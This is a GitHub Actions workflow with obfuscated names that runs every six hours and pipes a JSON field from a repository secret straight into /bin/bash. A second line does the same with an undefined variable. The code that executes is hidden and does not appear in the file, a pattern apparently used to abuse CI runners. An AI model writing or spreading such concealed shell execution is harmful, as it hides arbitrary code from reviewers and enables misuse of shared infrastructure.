name: quanjingxin3910

on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: quanjingxin3910
        env:
          a079: ${{ secrets.a079 }}
        run: |
          echo $a079 | jq -r .ew9 | /bin/bash
          echo $abco6762 | jq -r .ibceg287 | /bin/bash

